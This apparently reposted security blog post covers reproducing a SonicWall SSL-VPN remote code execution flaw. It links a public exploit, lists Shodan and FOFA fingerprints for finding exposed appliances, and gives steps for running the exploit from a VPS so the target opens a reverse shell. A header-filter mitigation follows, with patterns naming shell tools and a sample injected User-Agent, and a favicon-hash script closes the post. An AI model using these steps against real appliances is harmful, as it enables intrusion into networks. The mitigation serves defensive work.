SonicWall SSL-VPN RCE Reproduction and iconhash Script

admin, 2022-03-01 10:14:17





0x00 Preface 


    Historical versions of SonicWall SSL-VPN contain a vulnerability: a remote attacker can abuse a flaw in the CGI program's request handling by sending a crafted User-Agent header, achieving remote arbitrary command execution and taking control of the appliance.

For details see the write-up "VisualDoor: SonicWall SSL-VPN Exploit":

https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/


0x01 Vulnerability reproduction
0. Download the EXP script
https://github.com/darrenmartyn/visualdoor

1. Collect fingerprints of publicly exposed targets
Shodan fingerprint
http.favicon.hash:-1153950306
http.favicon.hash:-2012355198
Fofa fingerprint
icon_hash="-1153950306"
icon_hash="-2012355198"

2. Run the EXP script
Reading the EXP shows it is designed to be run directly on a VPS.
Start a listener on a local port for the shell, then send the crafted request so that the target server reverse-connects a shell to that port. The listener must be up before the request is sent, and the VPS must accept inbound connections on that port from the target; otherwise the command executes on the target but no shell comes back.
python2 visualdoor.py <target URL> <VPS IP> <VPS port>





0x02 Remediation

Temporary mitigation

Detect, or replace, command-execution signature strings that may appear in HTTP request headers (the payload for this exploit travels in the User-Agent). This is a signature filter in front of the appliance; it reduces exposure but does not remove the underlying flaw.
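The temporary mitigation above is a content check on request headers. What follows is an added example of such a check, not code from the page, from the exploit author or from SonicWall: it parses the headers of a raw HTTP request, flags header values carrying command-execution signatures, and offers a "replace" variant that neutralises the value instead of blocking the request. The page does not list the signature strings; the patterns below (the bash function-definition prefix `() {` that older CGI stacks evaluate when a header is exported into the process environment, command substitution, shell binaries and command separators) are this example's own choice, and both sample requests are constructed.

```python
import re

# ASSUMPTION: the page does not spell out the signature strings, so these
# patterns are this example's choice. They target values that have no
# business in a browser User-Agent or similar header: the bash function
# definition prefix a CGI environment variable can smuggle in, command
# substitution, shell binaries / the bash /dev/tcp reverse-shell idiom,
# and a command chained after a separator.
CMD_INJECTION_PATTERNS = [
    (re.compile(r"\(\s*\)\s*\{"), "bash function definition in header"),
    (re.compile(r"\$\(|`"), "command substitution"),
    (re.compile(r"/bin/(ba)?sh\b|/dev/tcp/"), "shell binary or /dev/tcp reverse shell"),
    (re.compile(r"[;|&]\s*(cat|nc|ncat|curl|wget|python|perl|bash|sh)\b"),
     "chained shell command"),
]

# Headers a CGI gateway turns into HTTP_* environment variables, and which
# are therefore worth inspecting (assumption: list chosen for this example).
INSPECTED_HEADERS = ("user-agent", "referer", "cookie", "accept", "accept-language")


def parse_request_headers(raw):
    """Parse the header block of a raw HTTP/1.1 request into a dict."""
    headers = {}
    for line in raw.split("\r\n")[1:]:   # skip the request line
        if not line:                      # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def check_headers(headers):
    """Return a list of (header name, reason) findings; empty means clean."""
    findings = []
    for name, value in headers.items():
        if name.lower() not in INSPECTED_HEADERS:
            continue
        for pattern, reason in CMD_INJECTION_PATTERNS:
            if pattern.search(value):
                findings.append((name, reason))
                break                     # one finding per header is enough
    return findings


def sanitize_headers(headers):
    """'Replace' variant: overwrite flagged header values instead of blocking."""
    clean = dict(headers)
    for name, _ in check_headers(headers):
        clean[name] = "filtered"
    return clean


# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    "GET /cgi-bin/welcome HTTP/1.1\r\n"
    "Host: vpn.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/87.0 Safari/537.36\r\n"
    "Accept-Language: zh-CN,zh;q=0.9\r\n"
    "\r\n"
)

SUSPICIOUS_REQUEST = (
    "GET /cgi-bin/welcome HTTP/1.1\r\n"
    "Host: vpn.example.com\r\n"
    "User-Agent: () { :; }; /bin/bash -c 'echo test'\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for raw in (BENIGN_REQUEST, SUSPICIOUS_REQUEST):
        hdrs = parse_request_headers(raw)
        print(check_headers(hdrs) or "clean", "->", sanitize_headers(hdrs).get("User-Agent"))
```

Running the block prints "clean" for the browser request and the finding plus the replaced User-Agent for the suspicious one. Keep the pattern list narrow: the separator pattern is anchored on a following shell command name precisely so that the `;` inside ordinary `Accept-Language` and User-Agent values does not trip it.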


General fix
Upgrade the SonicWall SMA firmware to a patched version.


0x03 Other
    Sharing an iconhash calculation script in Python; it is easy to customise and can be packaged into an EXE.
    It supports several calculation modes for files, images and URLs. In practice the base64 (FOFA/Shodan) hash option for files and URLs is the one you need, because both engines compute mmh3 over the line-wrapped base64 of the icon rather than over the raw bytes.


# -*- coding: UTF-8 -*-
# Favicon hash calculator: MD5 and mmh3 over a URL's content, a local file,
# or a literal string, each both raw and base64-encoded.
# Shodan (http.favicon.hash) and FOFA (icon_hash) use mmh3 over the
# line-wrapped base64 of the icon, i.e. the *_base64 variants below.
import argparse
import codecs
import hashlib
import os
import sys

import mmh3
import requests

requests.packages.urllib3.disable_warnings()

HEADERS = {
    # "Accept": "image/webp,image/apng,image/*,*/*;q=0.8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66",
    "Pragma": "no-cache",
    "Accept-Encoding": "gzip, deflate",
    "Cache-Control": "no-cache",
    "Accept-Language": "zh-CN,zh;q=0.9",
}


def hash_pair(content):
    """MD5 hex digest and mmh3 (signed 32-bit) of raw bytes."""
    return hashlib.md5(content).hexdigest(), mmh3.hash(content)


def to_base64(content):
    # codecs 'base64' behaves like Python 2's str.encode('base64'): MIME
    # style, wrapped at 76 chars with a trailing newline. This is the form
    # Shodan and FOFA feed into mmh3.
    return codecs.encode(content, "base64")


def fetch(url):
    headers = dict(HEADERS, Referer=url)
    return requests.get(url, headers=headers, verify=False, timeout=5).content


# hash image from url
def get_hash_url(url):
    url = url.strip()
    if not url:
        return '', ''
    try:
        return hash_pair(fetch(url))
    except Exception as e:
        print(e)
        return '', ''


# hash image base64 from url
def get_hash_url_base64(url):
    url = url.strip()
    if not url:
        return '', ''
    try:
        return hash_pair(to_base64(fetch(url)))
    except Exception as e:
        print(e)
        return '', ''


# hash image from file
def get_hash_file(filename):
    filename = filename.strip()
    if not os.path.isfile(filename):
        return '', ''
    with open(filename, 'rb') as fopen:
        return hash_pair(fopen.read())


# hash image base64 from file
def get_hash_file_base64(filename):
    filename = filename.strip()
    if not os.path.isfile(filename):
        return '', ''
    with open(filename, 'rb') as fopen:
        return hash_pair(to_base64(fopen.read()))


# hash string (encoded as UTF-8 bytes before hashing)
def get_hash_string(string):
    return hash_pair(string.strip().encode('utf-8'))


# hash string base64
def get_hash_string_base64(string):
    return hash_pair(to_base64(string.strip().encode('utf-8')))


def report(label, target, result, show_query):
    icon_hash_md5, icon_hash_mmh3 = result
    print('---------------------------')
    print('{}:{}'.format(label, target))
    print('icon_hash_md5:{}'.format(icon_hash_md5))
    print('icon_hash_mmh3:{}'.format(icon_hash_mmh3))
    if show_query:
        # the search-engine queries only make sense for the base64 variant
        print('\tFofa:\ticon_hash="{}"'.format(icon_hash_mmh3))
        print('\tshodan:\thttp.favicon.hash:{}'.format(icon_hash_mmh3))


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="The hash computation By md5 and mmh3")
    parser.add_argument("-u", "--url", help="Specify target url, like 'http://1.1.1.1/favicon.ico'")
    parser.add_argument("-f", "--file", help="Specify target file, like 'spring-favicon.ico'")
    parser.add_argument("-s", "--string", help="Specify target string, like '123456'")
    args = parser.parse_args()

    if len(sys.argv) == 1:
        print('please input some args or use --help !!!')
        sys.exit()

    if args.url:
        report('get_hash_url', args.url, get_hash_url(args.url), False)
        report('get_hash_url_base64', args.url, get_hash_url_base64(args.url), True)
    if args.file:
        report('get_hash_file', args.file, get_hash_file(args.file), False)
        report('get_hash_file_base64', args.file, get_hash_file_base64(args.file), True)
    if args.string:
        report('get_hash_string', args.string, get_hash_string(args.string), False)
        report('get_hash_string_base64', args.string, get_hash_string_base64(args.string), False)
    print('---------------------------')




END



This article was first published on the WeChat public account NOVASEC: SonicWall SSL-VPN RCE Reproduction and iconhash Script

Reposted by CN-SEC (original author credited): http://cn-sec.com/archives/494641.html